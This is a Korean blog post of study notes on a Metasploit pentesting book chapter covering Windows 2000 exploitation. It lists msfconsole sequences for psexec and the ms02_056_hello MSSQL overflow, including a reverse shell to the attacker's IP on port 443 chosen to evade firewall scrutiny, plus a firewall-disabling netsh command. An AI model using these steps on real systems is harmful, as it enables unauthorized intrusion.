칼리\메타스플로잇/칼리리눅스 입문자를 위한 메타스플로잇 중심의 모의침투

7장_윈도우 기반의 운영체제 침투

아놀드금자 2020. 12. 21. 13:47
728x90

 

MSF 보조기능 구문 -> use auxiliary

MSF 침투기능 구문 -> use exploit

 

 

윈도우 대상 침투 모듈 위치

/usr/share/doc/metasploit-framework/modules/exploit/windows 

 

공격대상: 윈도우 2000서버


psexec.rb 모듈을 이용한 침투

 

 

SMB서비스: 폴더공유 제공, psexec.rb 모듈로 침투 가능

/usr/share/doc/metasploit-framework/modules/exploit/windows/smb/psexec.rb 

소스 코드 확인해 보면 cve1999-0504 있음

cve1999-0504: 계정과 비밀번호를 이용해 페이로드를 실행하는 취약점

 

 

 

msf에서 다음과 같이 차례로 입력하여 공격을 수행한다.

use exploit/windows/smb/psexec
	//use 공격/운영체제/취약점분야/사용할모듈 

set payload windows/shell/blind_tcp
	//set 악성코드 악성코드사용할운영체제/적용후획득할작업환경/통신방식
    
set rhost 윈도우ip
set smbuser administrator
set smbpass 1234
exploit

 

blind_tcp: 정방향 접속

reverse_tcp: 역방향 접속 (방화벽X)

 

 

모두 입력하면 윈도우2000의 터미널을 사용할 수 있게된다!

 

 

 


ms02_056_hello.rb 모듈을 이용한 침투

 

 

ms-sql 2000서버를 대상으로 한다.

locate ms02_056_hello	//모듈위치파악

 

파악한 위치로 들어가 모듈을 열어보면 cve-2002-1123이 나온다.

 cve-2002-1123: mssql 2000 서버의 버퍼 오버플로우를 이용해 페이로드를 실행하는 취약점

 

 

xp_cmdshell

mssql 서버에서 사용하는 계정을 윈도우 운영체제에 속한 계정처럼 동작하는 기능(제어o)

-> mssql서버와 윈도우운영체제를 연동해 개발환경의 편리성을 제공

 

 

 

공격하기에 앞서 보조기능인 mssql_enum.rb 모듈을 이용하여 xp_cmdshell 사용 여부를 확인함

 

use auxiliary/admin/mssql/mssql_enum
set rhost 윈도우ip
set rport 1433
set username sa		//mssql 기본 이름
set password 1234
set thread 256
run

실행 결과...

xp_cmdshell is Enabled 사용한대~

 

 

 

이제 ms02_056_hello.rb 모듈을 사용한다.

 

use exploit/windows/mssql/ms02_056_hello
set payload windows/shell/reverce_tcp	//역방향접속!!
set rhost 윈도우ip
set lhost 공격자ip
set lport 443
exploit

 

역방향 접속은 정방향 접속과 다르게 lhost 공격자 주소와 포트도 지정해줘야 한다. 

443번 포트는 SSL 서비스를 의미하는데 방화벽 관리자의 의심을 피하기 위한 설정(임의설정 가능)

 

 

 

접속성공

netstat -n 으로 확인해보면 윈도우(공격대상자)가 칼리(공격자)에게 접속한 내용을 볼 수 있다.

 

 

tip 윈도우 방화벽 중지 명령어

netsh firewall set opmode mode=disable

 

 

이 모듈은 버퍼오버플로우를 사용하기 때문에 계정과 비밀번호가 없어도 침투가 가능하다고 한다.

이러한 취약점을 보완하기 위해서는 sa 계정의 사용을 금지하고 xp_cmdshell 기능을 중지해야 한다.

 

 

 

 

https://book.naver.com/bookdb/book_detail.nhn?bid=14648838 

 

칼리 리눅스 입문자를 위한 메타스플로잇 중심의 모의 침투

칼리 운영체제 기반의 메타스플로잇(MSF) 도구를 중심으로 모의 침투에 필요한 내용을 설명한다. 메타스플로잇 모듈을 중심으로 메타스플로잇 활용 능력을 향상시키는 데 역점을 두었을 뿐만 아

book.naver.com

 

728x90